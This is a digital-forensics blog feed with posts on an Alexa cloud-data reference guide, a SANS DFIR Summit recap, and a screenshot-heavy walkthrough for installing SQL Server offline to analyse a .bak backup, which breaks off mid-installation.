<span style="font-size: large;">Updated: January 30, 2018</span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-83635257232751669832017-12-26T16:13:00.002-05:002017-12-26T16:13:40.270-05:00Amazon Alexa Forensic Walkthrough Guide<br />
<span style="font-size: large;">Hello again readers and welcome back! We are working on wrapping up 2017 here at BriMor Labs, as this was a very productive and busy year. One of the things that <a href="https://twitter.com/b1n2h3x" target="_blank">Jessica</a> and <a href="https://twitter.com/brianjmoran" target="_blank">I</a> have been meaning to put together for quite some time was a small document summarizing the URLs to query from Amazon to return some of the Amazon Echosystem data.<br /><br />After several months, we (cough cough Jessica) finally was able to get the time to put it together and share it with all of you. We hope that it is helpful during your investigations and analysis, and if you need anything else please do not hesitate to reach out to Jessica or myself!</span><br />
<br />
<br />
<span style="font-size: large;"><a href="https://brimorlabs.box.com/v/AlexaCloudDataReferenceGuide" target="_blank">Alexa Cloud Data Reference Guide</a></span><br />
<br />
<br />
<br />
<br />Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-6480377769933892012017-06-26T12:53:00.001-04:002017-06-26T12:53:56.697-04:00A Brief Recap of the SANS DFIR Summit<br />
<span style="font-size: large;">Hello again readers and welcome back!! I had the pleasure of attending (and speaking at, more on that in a bit!) at the 10th SANS DFIR Summit this past week. It is one conference that I always try to attend, as it always has a fantastic lineup of DFIR professionals speaking about amazing research and experiences that they have had. This year was, of course, no exception, as the two day event was filled with incredible talks. The full lineup of slides from the talks <a href="https://www.sans.org/summit-archives/file/summit-archive-1498230402.pdf" target="_blank">can be found here</a>. This was also the first year that the presenters had "walk-up music" before the talks.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This year, my good friend <a href="https://twitter.com/B1N2H3X" target="_blank">Jessica Hyde</a> and I gave a presentation on the Amazon "Echo-system" in a talk we titled "<a href="https://www.sans.org/summit-archives/file/summit-archive-1498230402.pdf" target="_blank">Alexa, are you Skynet</a>". We even brought a slight cosplay element to the talk as I dressed up in a Terminator shirt and Jessica went full Sarah Connor! One other quick note about our talk that I would like to add, is we chose the song "<a href="https://dualcoremusic.bandcamp.com/track/all-the-things" target="_blank">All The Things</a>" by <a href="http://dualcoremusic.com/nerdcore/" target="_blank">Dual Core</a> as our walk-up music. Dual Core actually lives in Austin and fortunately his schedule allowed him to attend our talk. It was really cool having the actual artist who performed our walk-up music be in attendance at our talk!</span><br />
<span style="font-size: large;"><br /></span>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5udmCQtP8YlU4bkZQ9hZVeeIvjKn03Gh5-D6Owsd7XxIPgHEOEnPRAqNW_QUwHM9z5QfW4g9nc4x7BO0Kd0f4Ss3iKTerNV_Qnt7sNZCZ9gQCQwchmAKDhwi0ag8BS1a4kqPGTuyJ_KI_/s1600/alexa-talk.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5udmCQtP8YlU4bkZQ9hZVeeIvjKn03Gh5-D6Owsd7XxIPgHEOEnPRAqNW_QUwHM9z5QfW4g9nc4x7BO0Kd0f4Ss3iKTerNV_Qnt7sNZCZ9gQCQwchmAKDhwi0ag8BS1a4kqPGTuyJ_KI_/s640/alexa-talk.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Jessica and I speaking about the Amazon Echo-system at the 2017 SANS DFIR Summit</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We admittedly had a LOT of slides and a LOT of material to cover, but if you have attended any of our presentations in the past, the reason our slide decks tend to be long is that we want to make sure that the slides themselves can still paint a pretty good picture of what we talked about. This way, even if you were not fortunate enough to see our presentation, the you can follow along and the slides and they can also serve as reference points during future examinations. We received a lot of really great comments about our talk and had some fantastic conversations afterwards as well, so hopefully if you attended you enjoyed it!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">My other favorite part of the DFIR Summit is getting to see colleagues and friends that you interact with throughout</span><span style="font-size: large;"> the year, actually in person and not just as a message box in a chat window! Even though some of us live fairly close to each other in the greater Baltimore/DC area, we fly 1500 miles every summer to hang out for a few days. While in Austin several of us had some discussions about trying to start some local meetup type events on a more regular basis, so there definitely will be more on that to follow in the coming weeks! </span><br />
<span style="font-size: large;"><br /></span>
<br />Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com2tag:blogger.com,1999:blog-1547389155659419533.post-4555527097178241682017-03-09T10:11:00.002-05:002017-06-03T16:45:53.220-04:00How to load a SQL .bak file for analysis, without SQL Server previously installed<br />
<span style="font-size: large;">Hello again readers and welcome back! I hope that this new year has been treating you well so far! I recently worked a case with an interesting twist that I never had to deal with before, so I figured I would make a blog post about it and share my experiences. I also wanted to document the whole process just in case I have to deal with it again!</span><br />
<br />
<br />
<span style="font-size: large;">The case that I worked involved a SQL Server backup file (with a ".bak" file extension), which was created from a Microsoft SQL Server instance. Loading and parsing a SQL Server backup file is fairly trivial if you have a SQL Server environment, but I do not have a SQL Server environment and had to come up with a way to be able to process the data. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><u>Edited March 10, 2017 </u>- The reddit user <a href="https://www.reddit.com/user/fozzie33" target="_blank">fozzie33</a> made a fantastic point that I did not specify in this particular post. I was working from a copy of the data that was originally provided, but it is best to change the attributed to read-only in an effort to ensure the raw data itself does not change. In any forensic investigation you should always be working from a copy of the data and never the original, but changing the attributes to read-only is another step one should take to limit any changes to the data, even if it is a working copy!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I followed a total of nine steps to accomplish analysis of the backed up SQL database:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1) Download SQL Server 2016 SP1 Developer edition</span><br />
<span style="font-size: large;">2) Download Microsoft SQL Server Management Studio</span><br />
<span style="font-size: large;">3) Copy executables to flash drive</span><br />
<span style="font-size: large;">4) Copy executables to offline system</span><br />
<span style="font-size: large;">5) Install SQL Server</span><br />
<span style="font-size: large;">6) Install SSMS</span><br />
<span style="font-size: large;">7) Launch SSMS & restore the SQL database</span><br />
<span style="font-size: large;">8) Make your SQL queries using SSMS</span><br />
<span style="font-size: large;">9) Great success! High five!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 1: Download SQL Server 2016 SP1 Developer edition </b></span><a href="https://msdn.microsoft.com/library/dd206988.aspx">https://msdn.microsoft.com/library/dd206988.aspx</a><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hopefully you have a Microsoft Developer Network account, if not, pop over to the MSDN page and sign up for one, it is free and quite easy to do. Once you are logged in, you can download the SQL Server 2016 SP1 Developer edition. The reason for using this version, compared to the Express version, is that the Express version limits the size of your database to 10GB. If you know your database is going to be smaller than that, you can definitely use the Express version, but I prefer the Developer edition just to be sure I can handle the database regardless of what size the database will be. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">IMPORTANT NOTE: The license of the Developer edition explicitly prohibits using "Production data". While the backup file is indeed "Production data", I recommend installing the needed items and processing all of the data on a completely offline machine, and when you are finished with the analysis completely uninstall everything from your system. My personal take on the EULA is that Microsoft does not want you to use the Developer edition to power an online database backend, as they of course want you to purchase the license to allow you to do that. My opinion is that performing offline analysis of a SQL Server backup file is well within the limitations of the Developer license, but if you have any question on the legality of the issue please consult proper legal counsel, as I am not a lawyer nor did I stay at a Holiday Inn Express last night!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To download the files for your offline machine, first choose the "</span><span style="font-size: large;">SQL Server 2016 Developer Edition Download" option. </span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWV52xR3xUk0xQ6OSeLEYKOX55UzrKTsY4rVuv9cVODKvhpAzX8GdVtY4Oxbcs6RHzIcYCKQbiCuZkPY5c2utPFbFP6bRcCPjB6OyaLdBBfqiDpxTFA84lHntpbTvm3J7RgCPyDac1ybcm/s1600/Choose+Developer+Edition+Download.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWV52xR3xUk0xQ6OSeLEYKOX55UzrKTsY4rVuv9cVODKvhpAzX8GdVtY4Oxbcs6RHzIcYCKQbiCuZkPY5c2utPFbFP6bRcCPjB6OyaLdBBfqiDpxTFA84lHntpbTvm3J7RgCPyDac1ybcm/s640/Choose+Developer+Edition+Download.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Choose the "SQL Server 2016 Developer Edition Download" option</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">The download page will load, then choose the "SQL Server 2016 Developer with Service Pack 1" option.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHsiVf12ycGvFgCBR5I3Jra_FH9MLCjRLk1bYY-ri1-bunw8KJi0nzYcl4idOD6QO9RE22FEYHTeXgpt2eFnZ2pCTkLmzgjbQJeZI8NhMg0MHYmxI78XnzyJGek2Azifl9tgMDX3wapzuO/s1600/Download+SQL+Server+2016.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHsiVf12ycGvFgCBR5I3Jra_FH9MLCjRLk1bYY-ri1-bunw8KJi0nzYcl4idOD6QO9RE22FEYHTeXgpt2eFnZ2pCTkLmzgjbQJeZI8NhMg0MHYmxI78XnzyJGek2Azifl9tgMDX3wapzuO/s640/Download+SQL+Server+2016.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the "SQL Server 2016 Developer with Service Pack 1" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You will be presented with an option to download the .iso, or you can use the "Click here to utilize the SQL installer." option which will download a file with a name like "SQLServer2016-SSEI-Dev.exe</span><span style="font-size: large;">". This installer will let you download the files so you can install it all to your offline machine.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlyTsdE58WBWGXvT1VcBI2iF-V58pQzpZuN-lgTMialo_Vm4wAvOIG6wBs-XwrrjJ4EqZvW5F8g4ZUhyphenhyphentDMe09F0Sm6Vx9iLeCY0gFktUVIGFYOFzOc45m0KQBrtu0yb7xxJsdztLsqbuw/s1600/Use+SQL+Installer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlyTsdE58WBWGXvT1VcBI2iF-V58pQzpZuN-lgTMialo_Vm4wAvOIG6wBs-XwrrjJ4EqZvW5F8g4ZUhyphenhyphentDMe09F0Sm6Vx9iLeCY0gFktUVIGFYOFzOc45m0KQBrtu0yb7xxJsdztLsqbuw/s640/Use+SQL+Installer.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "Click here to utilize the SQL installer." option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH2meGBwO9pTDuNgF1fWVdH8yyXb1IvG6_dP0cyOFqmuF7vdPEzqfjq2bPWxkarv8xqc_zXgSzJ0HXfFhK1TH94wTZc46AbnzLqHrvHQ6QICNESfKXXPTkBk4_6aG8GRepyYKuknJwQuYz/s1600/SQLServer2016-SSEI-Dev.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH2meGBwO9pTDuNgF1fWVdH8yyXb1IvG6_dP0cyOFqmuF7vdPEzqfjq2bPWxkarv8xqc_zXgSzJ0HXfFhK1TH94wTZc46AbnzLqHrvHQ6QICNESfKXXPTkBk4_6aG8GRepyYKuknJwQuYz/s640/SQLServer2016-SSEI-Dev.jpg" width="512" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The file "SQLServer2016-SSEI-Dev.exe" was downloaded</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">When you run the program, you will be presented with a screen containing three options. We are going to select the "Download Media" option, as we want to install it on another machine.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSF77OSppWdKvSfr8NYMRyVDWl2pSNfn8WYT5ucOTS8Ig8rpf7NX9XVKxZXhjvRvqQH52kqL0r39sylPh6d9mXFan-acDR4MokVWXD1V3j7FJUiisDmO3JRslUz96Wu-uR26iTFb4SmtVJ/s1600/SQLInstallationType.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSF77OSppWdKvSfr8NYMRyVDWl2pSNfn8WYT5ucOTS8Ig8rpf7NX9XVKxZXhjvRvqQH52kqL0r39sylPh6d9mXFan-acDR4MokVWXD1V3j7FJUiisDmO3JRslUz96Wu-uR26iTFb4SmtVJ/s640/SQLInstallationType.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choosing the "Download Media" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;">On the next screen we will be presented with the option to download the ISO or the CAB. We want the CAB option as it will be easier to install on another Windows machine, so choose the "CAB" option and save it to the download path of your liking, then click the "Download" button.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhic8ALXfO7p-ZYr2-ad64RNtjtX_c1nysqt0rzOixb9GGHSXYG-AHJcZJyIfOz1BhaLdS5gMf-93EC7b4vr34olxjllFoL5Dvl0SA579-1P5VaOvcwf0f8qYx7y5OBod-fUCn8uSrK-9pj/s1600/Choosecab.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhic8ALXfO7p-ZYr2-ad64RNtjtX_c1nysqt0rzOixb9GGHSXYG-AHJcZJyIfOz1BhaLdS5gMf-93EC7b4vr34olxjllFoL5Dvl0SA579-1P5VaOvcwf0f8qYx7y5OBod-fUCn8uSrK-9pj/s640/Choosecab.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "CAB" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The download will take a few seconds (or minutes, depending on your ISP) and there will be a friendly new screen informing you that the download is finished upon completion.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0lLUYgjsf8XkQYrkRzYhCpQhsZXpNuzSq_ijHQcpbfXZ3z6SUX0GVt2cj6wUMTMfAv9kXY4p2GvOmRngjrShHYX2tfO0nodY7wonTjJzCxsbP6poBlxcf8YYPO2A_vkE2imU4C0qHxv55/s1600/DownloadComplete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0lLUYgjsf8XkQYrkRzYhCpQhsZXpNuzSq_ijHQcpbfXZ3z6SUX0GVt2cj6wUMTMfAv9kXY4p2GvOmRngjrShHYX2tfO0nodY7wonTjJzCxsbP6poBlxcf8YYPO2A_vkE2imU4C0qHxv55/s640/DownloadComplete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Congratulations, the download is now complete!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">When the download is complete, you should have the files "SQLServer2016-DEV-x64-ENU.box" and "</span><span style="font-size: large;">SQLServer2016-DEV-x64-ENU.exe" saved in your directory:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrs2toBogNM0XuVlLQ23rE1ZLYkDtTEBqLbCcYPvyRDk44AEdQAl47IcwKHQYqxPnEY5VoXmf60KBCghQf_hL0iEIQGZ_KnC17heBo07-99ZTReob-ay0dejkMcNQffHsF79DT7OPtvbcW/s1600/box_and_exe_dl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrs2toBogNM0XuVlLQ23rE1ZLYkDtTEBqLbCcYPvyRDk44AEdQAl47IcwKHQYqxPnEY5VoXmf60KBCghQf_hL0iEIQGZ_KnC17heBo07-99ZTReob-ay0dejkMcNQffHsF79DT7OPtvbcW/s640/box_and_exe_dl.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The files "SQLServer2016-DEV-x64-ENU.box" and "SQLServer2016-DEV-x64-ENU.exe" in the download folder</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 2: Download Microsoft SQL Server Management Studio </b></span><span style="color: #0000ee;"><u>https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms</u></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The Microsoft SQL Server Management Studio (SSMS) allows you to interact with data from the SQL database in a fairly easy, fairly straight forward manner. Even if you have very limited experience dealing with data from SQL, you can pretty easily start to navigate your way through with some of the built in options from SSMS. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5HdTdDDNBYmDQcP8Z7xg4ANZIdfHgHBizx09RyqCSXX23vinC4e6q4n3vuKcKiVs9ZipKxjXcCkRXU9Spmt18HzOXC_3HW4sqjsCFDXC2ygvNU7k1i6uGHiGgI9tRdGIstvSoV7T_6QkA/s1600/dl-ssms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5HdTdDDNBYmDQcP8Z7xg4ANZIdfHgHBizx09RyqCSXX23vinC4e6q4n3vuKcKiVs9ZipKxjXcCkRXU9Spmt18HzOXC_3HW4sqjsCFDXC2ygvNU7k1i6uGHiGgI9tRdGIstvSoV7T_6QkA/s640/dl-ssms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "Download SQL Server Management Studio" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There should a file with a name similar to "SSMS-Setup-ENU.exe" now saved in your downloads folder. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vrZ2S-guJkfGhcbo-CZnpVem3GkIvg9OxocQ62gQOKyGTkVB3u6AEs4Fgc5ZefyzIszGyV4e57erJ0bSqK5Kpb8yov-RnL0DlnhhTk7tUVRSiNjmQLbAROi6LKQNoKnsrFwTCz5gr_65/s1600/smss-in-dl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vrZ2S-guJkfGhcbo-CZnpVem3GkIvg9OxocQ62gQOKyGTkVB3u6AEs4Fgc5ZefyzIszGyV4e57erJ0bSqK5Kpb8yov-RnL0DlnhhTk7tUVRSiNjmQLbAROi6LKQNoKnsrFwTCz5gr_65/s640/smss-in-dl.jpg" width="518" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">SSMS-Setup-ENU.exe saved in the "Downloads" folder</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 3: Copy executables to flash drive</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The filenames themselves may change based on exactly when you download them, but you should now copy the two SQL Server installation files (.box and .exe) and the SSMS installation file to a flash drive so you can transfer it to your offline system.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqwwGihI_HV7NVA3zOrCcyz4gWzm_yQ1RvpBsy_aXX15q50iYCs-YyvNRuiGbLl2imgJO4nxp416sIGBs3pd-slTSTxVWJek_TLqITbyzd9a9l2NWnr1uTmYJQRPcjj1fhnh6d7aFyDGK/s1600/files_on-flashdrive.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqwwGihI_HV7NVA3zOrCcyz4gWzm_yQ1RvpBsy_aXX15q50iYCs-YyvNRuiGbLl2imgJO4nxp416sIGBs3pd-slTSTxVWJek_TLqITbyzd9a9l2NWnr1uTmYJQRPcjj1fhnh6d7aFyDGK/s640/files_on-flashdrive.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Files copied to flash drive for offline system</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 4: Copy executables to offline system</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Although you can install it directly from the flash drive, in my experience it is always better to copy the needed files to your offline system. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_sKT47BzEW9EY-v0cNQzSljCiNtNOXOGnMgnOJhdx1x6_7NZO90vh3kAD7JqsMGHoDgrfJNaMBvpBU77RjzX8I0oSU-Jp8wk5VpEeXxId_3ZG1DpJ2UUuue1YJqZ5kjF1ngx9_MSsS/s1600/Copied_to_offline_system.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_sKT47BzEW9EY-v0cNQzSljCiNtNOXOGnMgnOJhdx1x6_7NZO90vh3kAD7JqsMGHoDgrfJNaMBvpBU77RjzX8I0oSU-Jp8wk5VpEeXxId_3ZG1DpJ2UUuue1YJqZ5kjF1ngx9_MSsS/s640/Copied_to_offline_system.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Files copied to offline system</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;"><b>Step 5: Install SQL Server</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing we are going to do is install SQL Server to our offline system. When you double-click the file you are greeted with a popup asking for the directory in which you wish to save the extracted files. I just left this as the default option and clicked "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZCj7wFc3-3RWA2quNGFomfohmjD0vfPAb3Sa1k6gIT6sdzrg_jDNEsbSF6fx7a5AP6XdB1jWBH6WZb00_cXdobXJC728_PGRTkxWjbdUXoFA7y1-fRoimQBBiLW6x_J1wEX7Ki71pJFFb/s1600/Extracted_files-question.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZCj7wFc3-3RWA2quNGFomfohmjD0vfPAb3Sa1k6gIT6sdzrg_jDNEsbSF6fx7a5AP6XdB1jWBH6WZb00_cXdobXJC728_PGRTkxWjbdUXoFA7y1-fRoimQBBiLW6x_J1wEX7Ki71pJFFb/s640/Extracted_files-question.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Choose the directory for extracted files</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You will see a file extraction progress bar.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO3QYafhw3FAas6o5OjdbqhULy5N0cf5Q3G5FBlGGnrIA8ixt5koh-t-18TGs_A09gtQ5AB5ARDAa3QcK6Qg9Jt7Dy0-NnA_xojnv21KHMz1MK4yxiD6vpDOxEm-ROaTWWOkoNx-30Y8YR/s1600/extracting_files.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO3QYafhw3FAas6o5OjdbqhULy5N0cf5Q3G5FBlGGnrIA8ixt5koh-t-18TGs_A09gtQ5AB5ARDAa3QcK6Qg9Jt7Dy0-NnA_xojnv21KHMz1MK4yxiD6vpDOxEm-ROaTWWOkoNx-30Y8YR/s640/extracting_files.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">File extraction progress</span></i></td></tr>
</tbody></table>
</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">and when that is done, you will see a new window titled "SQL Server Installation Center". We are going to install SQL Server on our system, so click on the Installation link.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn8Yo8mp9sjpdYOUSKOUAaDf4oIa2xuR3l2ciBMLT8Ly9DSb0S9Zea7aLJfoH39yLvkGhlL6vr0vwxVoEysHnbuSNfvX0ARosoDPxnMIY7DpfhbprlGFCknn10EX2f-2M7CjZU-JNx8xD/s1600/Choose-installation.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn8Yo8mp9sjpdYOUSKOUAaDf4oIa2xuR3l2ciBMLT8Ly9DSb0S9Zea7aLJfoH39yLvkGhlL6vr0vwxVoEysHnbuSNfvX0ARosoDPxnMIY7DpfhbprlGFCknn10EX2f-2M7CjZU-JNx8xD/s640/Choose-installation.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choosing the Installation link</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are several options that are presented here, but we are only interested in the first one, labeled "New SQL Server stand-alone installation or add features to an existing installation".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
